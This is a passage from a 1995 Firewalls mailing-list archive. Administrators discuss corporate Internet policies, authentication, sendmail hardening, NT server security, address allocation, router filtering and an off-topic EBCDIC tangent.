coincidental. From firewalls-owner Wed Sep 13 07:37:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA17378 for firewalls-outgoing; Wed, 13 Sep 1995 06:27:17 -0700 Received: from arthur.crpht.lu (arthur.crpht.lu [158.64.4.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA17371 for ; Wed, 13 Sep 1995 06:27:01 -0700 Received: from cnsmac1.crpht.lu by arthur.crpht.lu with SMTP (1.37.109.4/16.2) id AA23562; Wed, 13 Sep 95 15:25:39 +0200 X-Sender: security@arthur.crpht.lu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 13 Sep 1995 15:29:13 +0100 To: Firewalls@GreatCircle.COM From: security@crpht.lu (Bruno MAMER) Subject: Re: Corporate Audits Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>I'm not sure if I should name names or not -- it's not my place to do >>so -- but I know for certain that at least one large industrial outfit >>was barred by their auditors from connecting to the Internet until they >>had a heavy-duty firewall in place. > >Which, if they're not VERY careful, merely means that the organization is >going to have a dozen or more "underground" connections spring up at >various sites and within various groups, each of which individually is >probably fairly insecure. It's just too easy for somebody to go get a >modem and phone line (or, heck, even an ISDN or frame relay line), and >service from some local or national service provider. They'll be in place >and in use and invaluable to the groups using them, and (alas) probably not >properly secured. > >How to deal with this varies by organization. However, blanket "Thou shalt >not connect to the Internet" directives are very difficult to enforce, and >seldom have the desired effect. You've got to provide useful alternatives >(like a useful connection through a properly secured central firewall). >The key is, the USERS determine the definition of "useful"; if they >determine that what you're offering doesn't meet their needs, they'll go >around you. I'm no network expert so correct me if I'm wrong but isn't it easy to detect if someone on a LAN connects to Internet (or a WAN) through a modem connection ? Won't there be on the lan some unusual trafic (I mean there addresses coming from outside the lan) which should be detected if a correct monitoring is done ? Second point, yes maybe it is difficult to enforce a "no internet connection" policy, but isn't that exactly the role of a security policy ? I mean if you point out in your policy that it is forbidden to connect to the internet, that does mean for those working in the company that it would be considered a professional fault to do so (as would be giving out information or whatever) ? Of course it's not 100% secure but that is a beginning. If not, what's the use of having a security policy ? Just thinking about it Bruno _________________________________________________________________________ Bruno MAMER bruno.mamer@crpht.lu Centre de Recherche Public Henri Tudor Computing and Network Services Our local archive on security : http://www.crpht.lu/CNS/html/PubServ/Security/security-home.html ------------------------------------------------------------------------- From firewalls-owner Wed Sep 13 07:39:47 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19009 for firewalls-outgoing; Wed, 13 Sep 1995 07:19:54 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19000 for ; Wed, 13 Sep 1995 07:19:49 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id JAA29598; Wed, 13 Sep 1995 09:17:43 -0500 Message-Id: <199509131417.JAA29598@psisa.com> Subject: Re: User Authentication To: afoss@translation.com (Andrew Foss) Date: Wed, 13 Sep 1995 09:17:42 -0500 (CDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199509130031.RAA05121@translation.com> from "Andrew Foss" at Sep 12, 95 05:31:28 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Are there any applications out there public domain or otherwise that do some > sort of basic user/password authentication for network users? > I've heard the name Radius used, but I thought they made displays? Kerberos? :) Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Wed Sep 13 08:32:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20886 for firewalls-outgoing; Wed, 13 Sep 1995 08:02:56 -0700 Received: from lobster.wellfleet.com (lobster.wellfleet.com [192.32.253.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA20876 for ; Wed, 13 Sep 1995 08:02:53 -0700 Received: from paperboy.corpeast.baynetworks.com (paperboy.wellfleet.com) by lobster.wellfleet.com (4.1/SMI-4.1) id AA26007; Wed, 13 Sep 95 11:00:24 EDT Received: from BayNetworks.com by paperboy.corpeast.baynetworks.com (4.1/SMI-4.1) id AA15632; Wed, 13 Sep 95 11:01:32 EDT From: Post_Office@BayNetworks.com (Post Office) Reply-To: Post_Office@BayNetworks.com To: Firewalls@GreatCircle.COM Subject: NDN: Firewalls-Digest V4 #522 Date: 12 Sep 1995 23:19:14 GMT Message-Id: <471719869.120350@BayNetworks.com> Organization: Bay Networks Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry. Your message could not be delivered to: Steve Grinder,Wellfleet Sales/Mkt (Mailbox or Conference is full.) From firewalls-owner Wed Sep 13 08:41:23 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA19886 for firewalls-outgoing; Wed, 13 Sep 1995 07:42:36 -0700 Received: from Fe3.rust.net (rust.net [204.157.12.254]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA19879 for ; Wed, 13 Sep 1995 07:42:33 -0700 Received: from dtw-20.rust.net by Fe3.rust.net via SMTP (940816.SGI.8.6.9/940406.SGI.AUTO) id KAA19103; Wed, 13 Sep 1995 10:57:50 -0700 Date: Wed, 13 Sep 1995 10:57:50 -0700 Message-Id: <199509131757.KAA19103@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) From: janken@rust.net (Kenneth J. Stephens) Subject: Re: MVS vs the world Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Is it fair to mention that EBCDIC has no full colon ? back slash ? >brackets ? curly brackets ? Number sign ? Exclamation point ? Requires >all eight bits just to pass the alphabet ? > > So say padgett EBCDIC full colon = hex "7A" or binary "0111 1010" EBCDIC back slash = hex "61" or binary "0110 0001" EBCDIC open curley bracket = hex "C0" or binary "1100 0000" EBCDIC close curley bracket = hex "D0" or binary "1101 0000" EBCDIC number sign = hex "7B" or binary "0111 1011" EBCDIC exclamation point = hex "5A" or binary "0101 1010" BCDIC open bracket = hex "4D" or binary "0100 1101" became EBCDIC open paren = hex "4D" or binary "0100 1101" BCDIC close bracket = hex "5D" or binary "0101 1101" became EBCDIC close paren = hex "5D" or binary "0101 1101" So say my green card. One out of six!!! Thank you for playing! Please read a few dumps and try again. Sorry for the mostly out of topic post. We now return you to the firewalls discussion. [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Wed Sep 13 09:16:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA20833 for firewalls-outgoing; Wed, 13 Sep 1995 08:02:09 -0700 Received: from gw0.telebase.com (gw0.telebase.com [192.132.57.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA20825 for ; Wed, 13 Sep 1995 08:02:06 -0700 Received: from wormhole.telebase.com by gw0.telebase.com id LAA09445 for ; Wed, 13 Sep 1995 11:07:28 -0400 Received: from odo.telebase.com (bmc@odo.telebase.com [192.132.57.217]) by wormhole.telebase.com (8.6.12/8.6.9.1) with ESMTP id LAA13210; Wed, 13 Sep 1995 11:18:13 -0400 Received: (from bmc@localhost) by odo.telebase.com (8.6.10/8.6.9.1) id LAA09033; Wed, 13 Sep 1995 11:01:58 -0400 Date: Wed, 13 Sep 1995 11:01:58 -0400 From: Brian Clapper Message-Id: <199509131501.LAA09033@telebase.com.> To: firewalls@greatcircle.com Subject: cc:Web, or Things To Come Sender: firewalls-owner@GreatCircle.COM Precedence: bulk FYI, according to the 4 Sept 1995 (V.12, N.36) issue of NetworkWorld, Lotus is getting ready to release cc:Web Mail, an NT-based server that permits cc:Mail users to access their cc:Mailboxes from anywhere on the Internet, using "any standard World-Wide Web browser." The server runs on an NT box; access is password protected (presumably using normal browser password authentication -- the article doesn't elaborate). Once "logged in," the user can manipulate his mailbox remotely. My favorite excerpt from the article: Mail users who have not seen cc:Web Mail said they are looking forward to checking it out. "Providing they have taken care of the security issues of connecting to the Internet, I think it is a great idea," said Scott Webster, a cc:Mail user with Canadian Occidental Petrol, Ltd., in Calgary, Alberta. And if security is a problem, Webster said users could build a firewall around their Internet connection to keep it safe. Can't wait 'til our users start clamoring for this. ---- Brian Clapper, bmc@telebase.com, http://www.netaxs.com/~bmc/ I've had fun before. This isn't it. From firewalls-owner Wed Sep 13 09:30:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA24499 for firewalls-outgoing; Wed, 13 Sep 1995 09:27:48 -0700 Received: from databus.databus.com (databus.databus.com [198.186.154.34]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA24489 for ; Wed, 13 Sep 1995 09:27:43 -0700 Date: Wed, 13 Sep 95 12:26 EDT Message-ID: <9509131226.AA00415@databus.databus.com> From: Barney Wolff To: janken@rust.net (Kenneth J. Stephens), padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Cc: firewalls@greatcircle.com Subject: Re: MVS vs the world Content-Length: 873 Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Date: Wed, 13 Sep 1995 10:57:50 -0700 > From: janken@rust.net (Kenneth J. Stephens) > > BCDIC open bracket = hex "4D" or binary "0100 1101" > became > EBCDIC open paren = hex "4D" or binary "0100 1101" > > BCDIC close bracket = hex "5D" or binary "0101 1101" > became > EBCDIC close paren = hex "5D" or binary "0101 1101" > > So say my green card. I know it's unofficial, but my dd translates [] to hex ad bd, so there is a unique translation even for the brackets. It's quite a separate question what shows up on the screen of a genuine 3270 for some of these characters, or what gets printed. Bigotry in either direction is non-PC :-) Wonder how many of us still have our green cards (other than resident aliens, of course)? I do. Barney Wolff From firewalls-owner Wed Sep 13 09:32:45 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA22690 for firewalls-outgoing; Wed, 13 Sep 1995 08:38:26 -0700 Received: from clark.net (clark.net [168.143.0.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA22680 for ; Wed, 13 Sep 1995 08:38:22 -0700 Received: (proberts@localhost) by clark.net (8.6.12/8.6.5) id LAA29267; Wed, 13 Sep 1995 11:36:52 -0400 Date: Wed, 13 Sep 1995 11:36:50 -0400 (EDT) From: "Paul D. Robertson" To: Bruno MAMER cc: Firewalls@GreatCircle.COM Subject: Re: Corporate Audits In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 13 Sep 1995, Bruno MAMER wrote: > I'm no network expert so correct me if I'm wrong but isn't it easy to > detect if someone on a LAN connects to Internet (or a WAN) through a modem > connection ? Won't there be on the lan some unusual trafic (I mean there > addresses coming from outside the lan) which should be detected if a > correct monitoring is done ? > Not if the PC acts as a proxy, which is true not only of compromised PCs, but also of protocol encapsulation, a la' win95, wfw, etc., where the packets destined for the intruder are not IP packets. This is the most likely form of attack, given that actually putting IP trafic on the network via routing necessitates the comprmise of routers beyond the initial subnet, if that subnet isn't between the target host and the default routes for the network, if you are looking to target hosts outside of the subnet that the compromised PC sits on. Also, on large multi-protocol networks, it may be impractical to monitor addresses based on protocol specific information. Paul. ----------------------------------------------------------------------------- Paul D. Robertson "My statements in this message are personal opinions proberts@clark.net which may have no basis whatsoever in fact." PSB#9280 From firewalls-owner Wed Sep 13 09:36:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21151 for firewalls-outgoing; Wed, 13 Sep 1995 08:10:08 -0700 Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA21144 for ; Wed, 13 Sep 1995 08:10:04 -0700 Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id KAA06805 for ; Wed, 13 Sep 1995 10:04:23 -0500 Received: from ignatz.bridge.com(167.76.24.6) by gatekeeper.Bridge.COM via smap (V1.0mjr) id sma006802; Wed Sep 13 10:04:14 1995 Received: from ernie.bridge.com by ignatz.bridge.com with SMTP id AA22660 (5.67b/IDA-1.5 for ); Wed, 13 Sep 1995 10:13:23 -0500 Date: Wed, 13 Sep 1995 10:13:23 -0500 From: Ken Hardy Message-Id: <199509131513.AA22660@ignatz.bridge.com> To: firewalls@greatcircle.com Subject: Re: NT security (was: Interpreting CERT advisories) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ian Dunkin wrote: >- On Tue, 12 Sep 1995, Ian Poynter wrote: > >> I think that since many of the (in)security problems on the Internet are >> unix-related, people can all too easily build a false sense of security >> around the "not-unix". I'm just waiting for the first Windows NT problem to >> show up on the CERT list; given the number of NT-based web servers out >> there, I suspect it's only a matter of time. > >Ken Hardy posted details on this list of a security >hole in the EMWAC NT web server a month or so ago. I understand there's >now a fix for this particular one, but it illustrates your point. Many (most?) Unix security holes have been the unforseen consequences of lapses in the programming of or configuration of services layered on top of the system, not in the kernel itself. The NT EMWAC security hole about which I posted was exactly that. The point of my post is that "not-unix != security". It is possible to poorly program and misconfigure on any system, as illustrated, and you're likely to see more of this as NT is used more for such services. You still have to know what you're doing and be able to perceive unintended uses and results. The point-n-click crowd are in for some surprises. -- KH From firewalls-owner Wed Sep 13 09:57:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21228 for firewalls-outgoing; Wed, 13 Sep 1995 08:11:44 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA21219 for ; Wed, 13 Sep 1995 08:11:37 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA03820; Wed, 13 Sep 95 11:04:35 -0400 Date: Wed, 13 Sep 95 11:04:34 -0400 Message-Id: <9509131504.AA03820@uvs1.orl.mmc.com> From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com Subject: MVS vs the world Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: Brian T. Tucker >Without wanting in any way to get into the MVS vs UNIX arguement, I think >you are incorrect about EBCDIC. Probably sadly out-of-date ( relying on a 1978 document and heaven knows EBCDIC had many unused byte values ) would not be surprised if it had been extended further. Does that make it EEBCDIC ? Warmly, Padgett ps (was remembering the pain of trying to pass ASCII source code from a VAX to a 370 a number of years ago - sometimes I come unstuck in time) From firewalls-owner Wed Sep 13 10:01:24 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA24609 for firewalls-outgoing; Wed, 13 Sep 1995 09:32:09 -0700 Received: from ns.iij.ad.jp (ns.iij.ad.jp [192.244.176.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA24602 for ; Wed, 13 Sep 1995 09:32:05 -0700 Received: from shiosai.iij.ad.jp (shiosai.iij.ad.jp [192.244.176.35]) by ns.iij.ad.jp (8.6.12+2.4W/3.3W9-NS) with SMTP id BAA17617; Thu, 14 Sep 1995 01:30:37 +0900 Message-Id: <199509131630.BAA17617@ns.iij.ad.jp> To: Brian Murrell cc: firewalls@GreatCircle.COM, billcurr@cyberspace.com, davidc@ns.iij.ad.jp Subject: Re: firewall with only one IP address ??? In-reply-to: Your message of "Tue, 12 Sep 1995 13:43:57 MST." <199509122043.NAA19619@mocha.bctel.net> Date: Thu, 14 Sep 1995 01:30:37 +0900 From: David R Conrad Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Apologies, as this is not really related to firewalls, but... >> The bummer with that is, (as UUNET just informed me this morning) is if >>I ever switch providers or dump UUNET, they want their 256 IP adresses >>BACK. Yes, since that's the only way to keep the size of the global routing tables down. >go get your own 256 host class c and then have uunet route that. It is likely UUNet will refuse to route the out of block addresses and request the site renumber into the UUNet CIDR block. In order for a large network (i.e., the Internet) to continue to grow at its current rate, addresses must be allocated topologically so individual sites can be aggregated together, thereby hiding leaf routing information. Taking addresses with you when you switch providers and/or obtaining addresses from outside a provider block and injecting those addresses into the routing system _is_ causing the Internet to partition (routers falling over due to lack of memory or CPU power handling routing updates). Firewalls and other forms of network address translation are extremely beneficial in helping prevent the partitioning of the Internet as large numbers of addresses are hidden by one or two addresses. As a side benefit, you might get a more secure environment too... :-) [Back to our previously scheduled discussion on the merits of MVS :-)] Regards, -drc From firewalls-owner Wed Sep 13 10:02:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA21437 for firewalls-outgoing; Wed, 13 Sep 1995 08:17:07 -0700 Received: from ns.inter.edu (NS.INTER.EDU [164.42.100.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA21430 for ; Wed, 13 Sep 1995 08:16:59 -0700 From: R@lce.org Received: from zorzal.metro.inter.edu by ns.inter.edu (AIX 3.2/UCB 5.64/4.03) id AA10010; Wed, 13 Sep 1995 11:18:05 -0400 Received: from NSTTC1/SMTPQueue by lce.org (Mercury 1.11); Wed, 13 Sep 95 11:15:49 +400 Received: from Mailqueue by NSTTC1 (Mercury 1.11); Wed, 13 Sep 95 11:15:26 +400 Organization: Locally Produced Equipment Project To: firewalls@greatcircle.com Date: Wed, 13 Sep 1995 11:15:24 AST Subject: source routing Priority: normal X-Mailer: Pegasus Mail v3.22 Message-Id: <11D946E99@lce.org> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry about the changed subject line but I had already deleted a short thread earlier, someone was asking for a program that could produce source routed packets to use in testing against a firewall. While looking around windows 95 I found that traceroute (tracert.exe) and ping (ping.exe) both claim in their usage blurb to be able to do loose source routing, ping also claims strict source routing. The programs aren't in the on-line help and are barely mentioned in the very thick and so far useless book with the resource kit. My guess is these came out of windows nt and would presumably be documented there. Anyone know? Ramon From firewalls-owner Wed Sep 13 10:30:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA26890 for firewalls-outgoing; Wed, 13 Sep 1995 10:26:41 -0700 Received: from argo.hks.com (argo.hks.com [192.156.170.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA26883 for ; Wed, 13 Sep 1995 10:26:37 -0700 Received: from ragnarok.hks.com (ragnarok.hks.com [192.101.199.9]) by argo.hks.com (8.6.12/8.6.12) with ESMTP id RAA03532 for <@hks.com:firewalls@GreatCircle.COM>; Wed, 13 Sep 1995 17:25:20 GMT Received: by ragnarok.hks.com (940816.SGI.8.6.9/940406.SGI) for firewalls@GreatCircle.COM id NAA09085; Wed, 13 Sep 1995 13:25:19 -0400 From: "Jim Littlefield" Message-Id: <9509131325.ZM9083@ragnarok.hks.com> Date: Wed, 13 Sep 1995 13:25:18 -0400 In-Reply-To: Barney Wolff "Re: MVS vs the world" (Sep 13, 12:26pm) References: <9509131226.AA00415@databus.databus.com> X-Mailer: Z-Mail (3.2.1 15feb95) To: firewalls@GreatCircle.COM Subject: Re: MVS vs the world Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sep 13, 12:26pm, Barney Wolff wrote: : : Wonder how many of us still have our green cards (other than resident : aliens, of course)? I do. I'm afraid to admit I have one AND a yellow card ;) -- Jim Littlefield "Soon anyone who's not on the World Wide Web will qualify for a government subsidy for the home-pageless." - Scott Adams From firewalls-owner Wed Sep 13 10:32:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA25806 for firewalls-outgoing; Wed, 13 Sep 1995 10:03:11 -0700 Received: from interlock.mckesson.com (interlock.mckesson.com [199.221.43.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA25797 for ; Wed, 13 Sep 1995 10:03:05 -0700 Received: from [128.1.53.158] (billhost.mckesson.com) by interlock.mckesson.com with SMTP id AA04818 (InterLock SMTP Gateway 3.0 for ); Wed, 13 Sep 1995 10:01:36 -0700 Date: Wed, 13 Sep 1995 10:01:36 -0700 Message-Id: <199509131701.AA04818@interlock.mckesson.com> Subject: Re: User Authentication From: Bill Husler To: Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Any hacker worth their salt will let the user long in using strong >authentication and then take over the session after the user has >logged in to their system. It is better to rely on user -> firewall >and/or firewall -> firewall encryption (using strong authentication, >of course) than to rely on strong authentication only. > I've been being told that most companies are piling their resources (buck) on the authentication and not using traffic encryption because they feel that session assumptions is really more difficult that one would be lead to believe and encryption represents considerable overhead. Any comments? Thanks, Bill The opinions expressed here-in are my own. Any similarities between these opinions and those of any other person - living or not - including my employer are purely coincidental. From firewalls-owner Wed Sep 13 11:02:43 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA27578 for firewalls-outgoing; Wed, 13 Sep 1995 10:39:27 -0700 Received: from little-miami.iac.net (little-miami.iac.net [198.180.60.135]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA27571 for ; Wed, 13 Sep 1995 10:39:22 -0700 From: cjolley@iac.net Received: from 199.6.47.253 by little-miami.iac.net with SMTP id NAA03571; Wed, 13 Sep 1995 13:36:35 -0400 Message-Id: <199509131736.NAA03571@little-miami.iac.net> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Date: Wed, 13 Sep 95 13:36:25 -0500 Subject: Re: MVS vs the world To: Barney Wolff , janken@rust.net (Kenneth J. Stephens), padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Cc: firewalls@GreatCircle.COM In-Reply-To: <9509131226.AA00415@databus.databus.com> X-Mailer: SPRY Mail Version: 04.00.06.17 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 13 Sep 95, Barney Wolff wrote: >> Date: Wed, 13 Sep 1995 10:57:50 -0700 >> From: janken@rust.net (Kenneth J. Stephens) >> >> BCDIC open bracket = hex "4D" or binary "0100 1101" >> became >> EBCDIC open paren = hex "4D" or binary "0100 1101" >> >> BCDIC close bracket = hex "5D" or binary "0101 1101" >> became >> EBCDIC close paren = hex "5D" or binary "0101 1101" >> >> So say my green card. > >I know it's unofficial, but my dd translates [] to hex ad bd, so there >is a unique translation even for the brackets. > >It's quite a separate question what shows up on the screen of a genuine >3270 for some of these characters, or what gets printed. > >Bigotry in either direction is non-PC :-) > >Wonder how many of us still have our green cards (other than resident >aliens, of course)? I do. > >Barney Wolff > > I still have mine, but it does not explain what the following code does: BALR 3,0 BALR 3,3 **** cjolley@iac.net **** All opinions are my own and not necessarily those of my employer **** From firewalls-owner Wed Sep 13 11:02:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA27154 for firewalls-outgoing; Wed, 13 Sep 1995 10:30:21 -0700 Received: from beach.sctc.com (beach.sctc.com [192.55.214.50]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA27130 for ; Wed, 13 Sep 1995 10:30:09 -0700 Received: from beach.sctc.com (daemon@localhost) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id MAA14779 for ; Wed, 13 Sep 1995 12:49:48 -0500 Received: from spirit.sctc.com (spirit.sctc.com [172.17.192.76]) by beach.sctc.com (8.6.12/8.6.12) with ESMTP id MAA14772 for ; Wed, 13 Sep 1995 12:49:47 -0500 Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id MAA17915; Wed, 13 Sep 1995 12:29:00 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id MAA20468; Wed, 13 Sep 1995 12:28:59 -0500 Date: Wed, 13 Sep 1995 12:28:59 -0500 From: Rick Smith Message-Id: <199509131728.MAA20468@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Secure version of Sendmail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > ..Sendmail is the only useful mail package out there out there. I'd be happy > to adopt anything which offers me Sendmail functionality in a more secure > fashion.... The best way to run Sendmail is to encapsulate it to stop the inevitable attacks. No version of Sendmail is "secure" against anything except *maybe* against previously patched vulnerabilities. The "smap" wrapper is one encapsulation approach. But if smap suffers from a failure (note recent reports of potential syslog based vulnerabilities) then you're right back to where you started. The more effective approach is to use some form on nonbypassable access control. This isolates the software components all the way to the bare metal. Attacks are limited to the encapsulated portion of the host and can be blocked from spilling over into your protected network. This requires a good, B level TCB or a Sidewinder with Type Enforcement. The point is, you *can't* guarantee that a large, capable, general purpose package is bug free, whether the bugs are security oriented or anything else. So you need something to backstop it, like Type Enforcement or maybe MLS protections. Rick. smith@sctc.com secure computing corporation From firewalls-owner Wed Sep 13 12:00:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA00880 for firewalls-outgoing; Wed, 13 Sep 1995 11:35:25 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA00872 for ; Wed, 13 Sep 1995 11:35:19 -0700 From: jet@abulafia.genmagic.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA05205; Wed, 13 Sep 95 14:33:58 -0400 Date: Wed, 13 Sep 95 14:33:57 -0400 Message-Id: <9509131833.AA05205@uvs1.orl.mmc.com> To: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) Cc: "firewalls@greatcircle.com"@uvs1.dnet.mmc.com Subject: The end of MVS vs the world Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If this doesn't stop soon I'll start reposting parts of "Programming the Commodore PET", whining about PETSCII and ranting about why companies won't port their servers to 8 bit micros. That, or I'll go into Amiga-owner persecution complex mode and ya'll will *really* be sorry: "I could run a firewall on my Amiga if you bastards would just port your code!" -- J. Eric Townsend vox #: USA 408.774.4252 work: jet@genmagic.com AT&T PersonaLink: A5803643645@attpls.net play: jet@well.sf.ca.us, http://www.spies.com/jet From firewalls-owner Wed Sep 13 12:03:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA01599 for firewalls-outgoing; Wed, 13 Sep 1995 11:55:50 -0700 Received: from tigger.jvnc.net (tigger.jvnc.net [128.121.50.145]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA01592 for ; Wed, 13 Sep 1995 11:55:45 -0700 Received: from [192.67.239.212] (franklin-tty12.jvnc.net) by tigger.jvnc.net with SMTP id AA27464 (5.65c/IDA-1.4.4 for firewalls@greatcircle.com); Wed, 13 Sep 1995 14:54:22 -0400 Date: Wed, 13 Sep 1995 14:54:22 -0400 X-Sender: corecom@tigger.jvnc.net Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: dave@corecom.com (David M. Piscitello) Subject: Direct experience with Xyplex packet filtering? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Anyone have direct experience with Xyplex routers? Their marketing literature suggests they have rather extensive filtering capabilities. What we're looking for is a dual ethernet router that supports packet filtering in/out on IP SA/DA, PROTO, UDP/TCP port at min, anything more would be gravy. Please post replies directly to me. No marketing, just experience, please! Thanks, dave David M. Piscitello Core Competence, Inc. 1620 Tuckerstown Road Dresher, PA USA 19025 dave@corecom.com 1.215.830.0692 From firewalls-owner Wed Sep 13 13:32:42 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA04821 for firewalls-outgoing; Wed, 13 Sep 1995 13:06:19 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA04814 for ; Wed, 13 Sep 1995 13:06:13 -0700 Received: from gaau.ga.mt.np.els-gms.att.net by relay4.UU.NET with SMTP id QQzhbc00409; Wed, 13 Sep 1995 16:05:11 -0400 Date: Wed, 13 Sep 1995 15:57:52 -0500 From: ufpsprod!gmyers@atlml1.attmail.com (MYERS) Received: from atlml1 by attmail; Wed Sep 13 20:04 GMT 1995 Received: from ufpsprod by atlml1; Wed, 13 Sep 1995 15:58 EDT Received: from ufps11.ufps by ufps.att.com (4.1/SMI-4.1) id AA13233; Wed, 13 Sep 95 15:57:53 EDT Subject: MVS religious war, was MVS vs the world To: firewalls@GreatCircle.COM Message-Id: <9509131957.AA13233@ufps.att.com> Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Come on folks, what's the name of this list anyway? If wanted to read all this MVS vs. 